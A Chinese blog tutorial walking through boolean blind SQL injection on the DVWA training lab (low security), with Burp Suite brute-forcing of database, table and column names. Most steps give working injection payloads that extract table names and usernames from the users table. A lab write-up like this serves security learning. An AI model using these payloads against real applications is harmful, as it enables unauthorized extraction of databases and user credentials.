DVWA low盲注,用brup快速爆破,详细讲解

最新推荐文章于 2024-09-12 17:49:07 发布
最新推荐文章于 2024-09-12 17:49:07 发布
阅读量1.5k 收藏 12
点赞数 47
文章标签: sql web安全 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52480259/article/details/139967664
版权

step1:判断是否存在注入以及注入类型

  • 输入1,输出exists

  • 输入1 and 1=2#  输出exists 说明他不是整型注入,是字符型注入

验证是字符型注入

step2:判断列数,用 order by

  • 输入1' and order by 2 # 显示exists,而输入1' and order by 3 # 报错,说明只有两列

step3:猜解数据库的长度(绝大部分不超过10位)

  • 输入1' and length(database())=5 # 用brup抓包去保利破解他的长度

猜解成功,数据库的长度为4位

step4:现在来猜解数据库的名字

  • 输入1' and ascii(substr(database(),1,1))=65 # 这里的substr是取数据库的第一个字符(其中死第一个1是从1开始,第二个1是取几个字符),看他等不等于ascii表中的65 ,然后用brup爆破猜解数据库的名字,因为要直接爆破他的名字,而不是一个一个爆破,这样速度太慢了。爆破模式选择选择第四种。

step5:数据库名字知道后,就可以来猜解数据库中有多少个数据表

  • 输入1' and (select count(table_name) from information_schema.tables where table_schema=database())=5 # 然后用BRUP抓包破解,可以看出它里面只有2个表

step6:现在来猜解表名

  • 先来猜解第一个表的长度,输入 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=5 # 其中limit的意思限制输出,在这里的意思就是从数据dvwa中选取第一个表的意思,然后继续用brup爆破他的长度,可以看出他的长度为9位

  • 现在来爆破第一个表的名字,输入 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) =65 # 注意这里后面这里的两个1,第一个1是数据表的第一个字符(这个可爆破),第二个1是提取1个字符。然后用brup爆破他的名字。

  • 现在来猜解第二个表名,重复上面的步骤,输入1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=10 #

  • 现在又来猜解第二个表名重复上面的第二个步骤,输入1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)) =65 # 

step7:从上面两个表对比,很明显我们需要知道第二表的内容

  • 猜解users表中的字段个数,输入 1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=5 #

  • 一个一个爆破太慢了,我就我详细讲了,直接爆破里面的user字段中的第一个字段,输入 1' and ascii(substr((select user from users limit 0,1),1,1))=65 #

以此类推爆破第二用户名,输入:1' and ascii(substr((select user from users limit 1,1),1,1))=65 #

离开延禧宫的随缘鱿鱼
关注
python脚本自动化盲注_python dvwa布尔盲注自动化脚本(level=low
weixin_36450592的博客
01-15 244
仅供学习代码参考1#python dvwa布尔盲注自动化脚本2 importrequests3 importstring4 importtime5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="6 token={"security":"low","PHPSESS...
DvwaSQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1340
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
DVWA布尔盲注Low级Python脚本
m0_74485250的博客
02-21 2238
【代码】DVWA布尔盲注Low级Python脚本。
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 1959
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
sqlmap实现dvwa中的盲注详解
永不垂头的博客
08-06 2936
sqlmap实现dvwa中的盲注详解 一、 dvwasql盲注 ① 启动Burpsuite,在SQL injection(Blind)中输入如下,然后查看Burpsuite中抓到的URL和Cookie。 ② 启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ ,可以查看数据库类型。 PHPSESSID=jmrh7e40u41fjch3g2ht57dv00 Cookie: security=low
DVWA盲注详解
qq_45788625的博客
04-18 6639
low等级DVWA盲注详解
DVWAsql注入——盲注
Williamanddog的博客
12-22 3107
DVWA盲注
基于dvwasql盲注(Blind)-低中高
滕财然的博客
11-15 2814
目录sql盲注sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5584
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
基于DVWA靶场的盲注脚本
altersueyunsheng的博客
05-28 466
基于DVWA的自动盲注脚本 本文针对的是dvwa盲注部分的low级别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔盲注 dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断,盲注 str = f'?id={sql}&am
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 348
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
SQL(结构性查询语句)
2301_78693337的博客
09-11 470
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2355
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
sqlserver常用的sql命令
2301_76664379的博客
09-11 713
备注:D 表示全备份,i 表示差异备份,L 表示日志备份。
金蝶云星空查询SQL
zhanzhibo的专栏
09-10 406
税率、仓库、部门、员工、供应商、客户、物料类别、物料查询、BOM查询、辅助资料:工程项目、辅助资料:产品服务、科目、核算维度、科目余额、未转采购订单的采购申请、采购订单未完结的:待接收的、
mysql DBA常用的sql
最新发布
weixin_44550507的博客
09-12 738
DBA常用sql,方便性能优化
RocketMQ出现The broker does not support consumer to filter message by SQL92
山不见我,我自见山
09-12 303
然后通过rocketmq-console来查看,集群中的这个属性是否为true,为true就可以了。在使用RocketMQ使用SQL过滤消息的时候,出现下面错误。原因是我们的配置文件没有开启SQL过滤功能,我们需要在。接着我们重启namesrv与broker服务就解决问题。配置文件中添加下面命令。
DVWA盲注攻击:识别与利用技术详解
DVWA下的SQL注入(盲注)是一种高级的安全漏洞,它与常规SQL注入的不同之处在于,常规注入允许攻击者直接观察到查询结果,而盲注则由于隐藏性,使得攻击者无法直接从页面反馈中获取有效信息。盲注主要分为低级和高级...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值